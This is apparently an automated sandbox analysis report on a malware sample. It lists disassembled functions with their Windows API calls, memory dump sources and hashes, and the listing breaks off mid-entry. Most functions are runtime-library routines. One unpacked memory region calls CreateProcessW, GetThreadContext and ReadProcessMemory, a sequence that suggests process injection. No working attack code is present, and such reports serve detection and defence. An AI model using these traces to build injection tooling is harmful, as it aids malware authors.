                                                                  • Instruction ID: 037af984c31e45d2eba1667da4110afde09ec037f8c7c70a7ba3b545e39f19c1
                                                                  • Opcode Fuzzy Hash: 696734406a517583783f8cd8ee3108558abfab0d20938609aa774cb80e4812d5
                                                                  • Instruction Fuzzy Hash: 1A113979A11208BFDB228FA4DC84EAF7BBCEF44744F108869E805D7214E731AE419B60
                                                                  Function 00FD7DD8 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateProcessW.KERNELBASE(?,00000000), ref: 00FD8593
                                                                  • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00FD8629
                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00FD864B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1350999171.0000000000FD6000.00000040.00000020.00020000.00000000.sdmp, Offset: 00FD6000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_fd6000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                  • String ID:
                                                                  • API String ID: 2438371351-0
                                                                  • Opcode ID: a5f8eca76df1c4d60a387bf050efe929c827b8bdc82418feca4108ede207e1c1
                                                                  • Instruction ID: 1de679feda84a014c9bbca53a0e13dcb5618b8d98cb6ef742248210616b017a1
                                                                  • Opcode Fuzzy Hash: a5f8eca76df1c4d60a387bf050efe929c827b8bdc82418feca4108ede207e1c1
                                                                  • Instruction Fuzzy Hash: 9F621E30A142189BEB24DFA4C850BDEB376FF58700F1491A9D10DEB390EB759E81DB5A
                                                                  Function 0039C396 Relevance: 6.2, APIs: 4, Instructions: 154COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00354517: _fseek.LIBCMT ref: 0035452F
                                                                    • Part of subcall function 0039C56D: _wcscmp.LIBCMT ref: 0039C65D
                                                                    • Part of subcall function 0039C56D: _wcscmp.LIBCMT ref: 0039C670
                                                                  • _free.LIBCMT ref: 0039C4DD
                                                                  • _free.LIBCMT ref: 0039C4E4
                                                                  • _free.LIBCMT ref: 0039C54F
                                                                    • Part of subcall function 00371C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00377A85), ref: 00371CB1
                                                                    • Part of subcall function 00371C9D: GetLastError.KERNEL32(00000000,?,00377A85), ref: 00371CC3
                                                                  • _free.LIBCMT ref: 0039C557
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                  • String ID:
                                                                  • API String ID: 1552873950-0
                                                                  • Opcode ID: 2db9d723d2f1f24614347a7e6fc8c80c315d14cd5ac174f49895e1fbecc6b5fc
                                                                  • Instruction ID: 35632895f5dee093afebbf24ae65e424b2af297f8c9647f316eeb49262e8a094
                                                                  • Opcode Fuzzy Hash: 2db9d723d2f1f24614347a7e6fc8c80c315d14cd5ac174f49895e1fbecc6b5fc
                                                                  • Instruction Fuzzy Hash: 455190B1904218AFDF269F69DC81BADBBB9EF08304F00409EF64CA7251DB715A80CF19
                                                                  Function 0039C71A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetTempPathW.KERNEL32(00000104,?), ref: 0039C72F
                                                                  • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0039C746
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Temp$FileNamePath
                                                                  • String ID: aut
                                                                  • API String ID: 3285503233-3010740371
                                                                  • Opcode ID: 03b5a574cd1e26605e6280d87bfaf9b9c9e0bec71649ebc7af448022345331ce
                                                                  • Instruction ID: 22b7287fb098a854f5cd4251b719e791f667b38d86d7b07eccae494e78c25440
                                                                  • Opcode Fuzzy Hash: 03b5a574cd1e26605e6280d87bfaf9b9c9e0bec71649ebc7af448022345331ce
                                                                  • Instruction Fuzzy Hash: B0D05E7190030EABDB10AB90EC0EF8A7B6C9700704F0005A27690A50F1DAB4E6998B54
                                                                  Function 003AF8AE Relevance: 4.9, APIs: 3, Instructions: 385COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5323a1ec99a4d606b1f6aeffa2981b85672b8e57312e551fa3f9f3df6aeab42f
                                                                  • Instruction ID: 70a9cca4764cd36211a7e9785c93b3c1f895a792b8f577532db17874123b9ae2
                                                                  • Opcode Fuzzy Hash: 5323a1ec99a4d606b1f6aeffa2981b85672b8e57312e551fa3f9f3df6aeab42f
                                                                  • Instruction Fuzzy Hash: 8FF169716083019FCB12DF68C885B6AB7E5FF89314F14892EF9959B292D730E905CB82
                                                                  Function 00354FFC Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 00355022
                                                                  • Shell_NotifyIconW.SHELL32(00000000,?), ref: 003550CB
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: IconNotifyShell__memset
                                                                  • String ID:
                                                                  • API String ID: 928536360-0
                                                                  • Opcode ID: e99c290ee9bf9b4ae40d4c65c4bf45f74fb3865f1ce2640c11a5fd1faadf5f13
                                                                  • Instruction ID: 0dc21cfddab7b8acf3b6a373e3735538ce72e94772e5d4e623f0e88f58c63756
                                                                  • Opcode Fuzzy Hash: e99c290ee9bf9b4ae40d4c65c4bf45f74fb3865f1ce2640c11a5fd1faadf5f13
                                                                  • Instruction Fuzzy Hash: D93181B0505701DFC722DF34D855A9BBBE8FF48309F00492EEA9A87261E7717948CB96
                                                                  Function 0037395C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __FF_MSGBANNER.LIBCMT ref: 00373973
                                                                    • Part of subcall function 003781C2: __NMSG_WRITE.LIBCMT ref: 003781E9
                                                                    • Part of subcall function 003781C2: __NMSG_WRITE.LIBCMT ref: 003781F3
                                                                  • __NMSG_WRITE.LIBCMT ref: 0037397A
                                                                    • Part of subcall function 0037821F: GetModuleFileNameW.KERNEL32(00000000,00410312,00000104,00000000,00000001,00000000), ref: 003782B1
                                                                    • Part of subcall function 0037821F: ___crtMessageBoxW.LIBCMT ref: 0037835F
                                                                    • Part of subcall function 00371145: ___crtCorExitProcess.LIBCMT ref: 0037114B
                                                                    • Part of subcall function 00371145: ExitProcess.KERNEL32 ref: 00371154
                                                                    • Part of subcall function 00377C0E: __getptd_noexit.LIBCMT ref: 00377C0E
                                                                  • RtlAllocateHeap.NTDLL(00F90000,00000000,00000001,00000001,00000000,?,?,0036F507,?,0000000E), ref: 0037399F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                  • String ID:
                                                                  • API String ID: 1372826849-0
                                                                  • Opcode ID: e5bdba4dd90bfb55cbeaa80271a1570ab8266ee004244d1a265ed31e7c8e71db
                                                                  • Instruction ID: 82c6ae587a3ffba6a900189739c02b60647ac089d52f800f7a254d66c67245bc
                                                                  • Opcode Fuzzy Hash: e5bdba4dd90bfb55cbeaa80271a1570ab8266ee004244d1a265ed31e7c8e71db
                                                                  • Instruction Fuzzy Hash: 2C01D6362852059AE6333B39DC56B6A33989B83720F21C025F60D9F192DFFCDD409660
                                                                  Function 0039C6D9 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,0039C385,?,?,?,?,?,00000004), ref: 0039C6F2
                                                                  • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,0039C385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 0039C708
                                                                  • CloseHandle.KERNEL32(00000000,?,0039C385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0039C70F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: File$CloseCreateHandleTime
                                                                  • String ID:
                                                                  • API String ID: 3397143404-0
                                                                  • Opcode ID: 4246c31ad0c1ce0ad7ee5a4f64e456b602206eb5359cc344df9db72e2bc86251
                                                                  • Instruction ID: 6cd19ae830133b35d363ea40de25eb8bcd7cb91d763b7cbf760cdd81a7abc723
                                                                  • Opcode Fuzzy Hash: 4246c31ad0c1ce0ad7ee5a4f64e456b602206eb5359cc344df9db72e2bc86251
                                                                  • Instruction Fuzzy Hash: 42E08632141224BBDB221F54BC0AFCA7B1CEB05760F104111FB64690E097B125218798
                                                                  Function 0039BB64 Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _free.LIBCMT ref: 0039BB72
                                                                    • Part of subcall function 00371C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00377A85), ref: 00371CB1
                                                                    • Part of subcall function 00371C9D: GetLastError.KERNEL32(00000000,?,00377A85), ref: 00371CC3
                                                                  • _free.LIBCMT ref: 0039BB83
                                                                  • _free.LIBCMT ref: 0039BB95
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                  • String ID:
                                                                  • API String ID: 776569668-0
                                                                  • Opcode ID: 9be2b5beef45e3014043d3abdf219173afad32993680376f9e1db3d5b0d03a7e
                                                                  • Instruction ID: 9e19741a72ec166b590c99061cdd18c56d93580d128d4fbabcf92bcd47b7414a
                                                                  • Opcode Fuzzy Hash: 9be2b5beef45e3014043d3abdf219173afad32993680376f9e1db3d5b0d03a7e
                                                                  • Instruction Fuzzy Hash: A4E012A264174247DE3665BD7F4CEB363CC4F04351B15081DB55DEB18ACF28E84085A4
                                                                  Function 00352322 Relevance: 3.9, APIs: 3, Instructions: 159COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 003522A4: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,003524F1), ref: 00352303
                                                                  • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 003525A1
                                                                  • CoInitialize.OLE32(00000000), ref: 00352618
                                                                  • CloseHandle.KERNEL32(00000000), ref: 003C503A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Handle$CloseInitializeMessageRegisterWindow
                                                                  • String ID:
                                                                  • API String ID: 3815369404-0
                                                                  • Opcode ID: 6b6a5e919b8556f8606ac192dfed14c0cc57f46ce544f7cc4963e9300e78a771
                                                                  • Instruction ID: 189446557699ab205661d731f39c5ac335af662b014042385225ead6c7c54829
                                                                  • Opcode Fuzzy Hash: 6b6a5e919b8556f8606ac192dfed14c0cc57f46ce544f7cc4963e9300e78a771
                                                                  • Instruction Fuzzy Hash: 9B71DEB49013859BC705EF6AA9909D5BBA5BB99340780C2BEDB1AEB7B1CB740444CF0C
                                                                  Function 00353A0F Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • IsThemeActive.UXTHEME ref: 00353A73
                                                                    • Part of subcall function 00371405: __lock.LIBCMT ref: 0037140B
                                                                    • Part of subcall function 00353ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00353AF3
                                                                    • Part of subcall function 00353ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00353B08
                                                                    • Part of subcall function 00353D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00353AA3,?), ref: 00353D45
                                                                    • Part of subcall function 00353D19: IsDebuggerPresent.KERNEL32(?,?,?,?,00353AA3,?), ref: 00353D57
                                                                    • Part of subcall function 00353D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,00411148,00411130,?,?,?,?,00353AA3,?), ref: 00353DC8
                                                                    • Part of subcall function 00353D19: SetCurrentDirectoryW.KERNEL32(?,?,?,00353AA3,?), ref: 00353E48
                                                                  • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00353AB3
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
                                                                  • String ID:
                                                                  • API String ID: 924797094-0
                                                                  • Opcode ID: 8cf4f73450726d1c6b337a7fa1a68f8f5e3b7e66cc86cdf839a0dd2256545cf3
                                                                  • Instruction ID: 46e6b8a990e4bf88cc80782a055c7cb54b448da3269404802fb0f524a839667c
                                                                  • Opcode Fuzzy Hash: 8cf4f73450726d1c6b337a7fa1a68f8f5e3b7e66cc86cdf839a0dd2256545cf3
                                                                  • Instruction Fuzzy Hash: 94118C719043419BC302EF69E84595ABFE8EB98750F00892FF9848B2B1DB709654CB9A
                                                                  Function 0037E9D2 Relevance: 3.1, APIs: 2, Instructions: 52COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ___lock_fhandle.LIBCMT ref: 0037EA29
                                                                  • __close_nolock.LIBCMT ref: 0037EA42
                                                                    • Part of subcall function 00377BDA: __getptd_noexit.LIBCMT ref: 00377BDA
                                                                    • Part of subcall function 00377C0E: __getptd_noexit.LIBCMT ref: 00377C0E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                                                  • String ID:
                                                                  • API String ID: 1046115767-0
                                                                  • Opcode ID: 0745042f5acc16416224d0624ae6c71b9b414d8f3637c0410af30998965d2ab4
                                                                  • Instruction ID: ffc55fe466db08de4ea9ab388ba347df846111009c92d38662d4d3f2783c0ecb
                                                                  • Opcode Fuzzy Hash: 0745042f5acc16416224d0624ae6c71b9b414d8f3637c0410af30998965d2ab4
                                                                  • Instruction Fuzzy Hash: 48118272809A149AD773BF68C9423587B616F8A331F26C394E42C5F1E2CBBC8840D6A5
                                                                  Function 0036F4EA Relevance: 3.0, APIs: 2, Instructions: 43COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0037395C: __FF_MSGBANNER.LIBCMT ref: 00373973
                                                                    • Part of subcall function 0037395C: __NMSG_WRITE.LIBCMT ref: 0037397A
                                                                    • Part of subcall function 0037395C: RtlAllocateHeap.NTDLL(00F90000,00000000,00000001,00000001,00000000,?,?,0036F507,?,0000000E), ref: 0037399F
                                                                  • std::exception::exception.LIBCMT ref: 0036F51E
                                                                  • __CxxThrowException@8.LIBCMT ref: 0036F533
                                                                    • Part of subcall function 00376805: RaiseException.KERNEL32(?,?,0000000E,00406A30,?,?,?,0036F538,0000000E,00406A30,?,00000001), ref: 00376856
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                  • String ID:
                                                                  • API String ID: 3902256705-0
                                                                  • Opcode ID: ea8aba7212e3a1b23f534223e686e7100b1e59084289eee39e3ceb356135f644
                                                                  • Instruction ID: 91fa7c938512c34a5d1a99ead6384ab7dd70ef9de890e7a6def5975abf88c4d9
                                                                  • Opcode Fuzzy Hash: ea8aba7212e3a1b23f534223e686e7100b1e59084289eee39e3ceb356135f644
                                                                  • Instruction Fuzzy Hash: AFF0F43210025DABC717BF99E8129EE77ACAF01354F60C026FA09AA181CFB09A4086A5
                                                                  Function 003735E4 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00377C0E: __getptd_noexit.LIBCMT ref: 00377C0E
                                                                  • __lock_file.LIBCMT ref: 00373629
                                                                    • Part of subcall function 00374E1C: __lock.LIBCMT ref: 00374E3F
                                                                  • __fclose_nolock.LIBCMT ref: 00373634
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                  • String ID:
                                                                  • API String ID: 2800547568-0
                                                                  • Opcode ID: 4850a78826f1bcdd6a67165d0ebe51192301786ea46424ee4f62b292e3a89558
                                                                  • Instruction ID: f0b8cef8239f9318f7303eebdde2e5aad1b871bf9bcdc4856183205e41872189
                                                                  • Opcode Fuzzy Hash: 4850a78826f1bcdd6a67165d0ebe51192301786ea46424ee4f62b292e3a89558
                                                                  • Instruction Fuzzy Hash: E1F0B471801614AAD7337B65884276EBAE06F41730F26C119E46DEF2C1CB7C8A01AB55
                                                                  Function 00FD7DD5 Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateProcessW.KERNELBASE(?,00000000), ref: 00FD8593
                                                                  • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00FD8629
                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00FD864B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1350999171.0000000000FD6000.00000040.00000020.00020000.00000000.sdmp, Offset: 00FD6000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_fd6000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                  • String ID:
                                                                  • API String ID: 2438371351-0
                                                                  • Opcode ID: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                                                                  • Instruction ID: ec5ddae3f2b0646dced1413778eef949aa5075db989ebe28973318d11ac62d97
                                                                  • Opcode Fuzzy Hash: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                                                                  • Instruction Fuzzy Hash: B512CF24E18658C6EB24DF64D8507DEB232EF68340F1090E9910DEB7A5E77A4F81CF5A
                                                                  Function 00372957 Relevance: 1.6, APIs: 1, Instructions: 135COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __flush.LIBCMT ref: 00372A0B
                                                                    • Part of subcall function 00377C0E: __getptd_noexit.LIBCMT ref: 00377C0E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: __flush__getptd_noexit
                                                                  • String ID:
                                                                  • API String ID: 4101623367-0
                                                                  • Opcode ID: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                                  • Instruction ID: 35e12b3d3303b4931d9e0c275cf11d5ffde9c49637d331e272b45c680ea8f442
                                                                  • Opcode Fuzzy Hash: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                                  • Instruction Fuzzy Hash: 7241C4317007069FDB3A8E69C8805AF77B6AF45360B29C53DE94DCB240EB78DD508B40
                                                                  Function 0036ED18 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
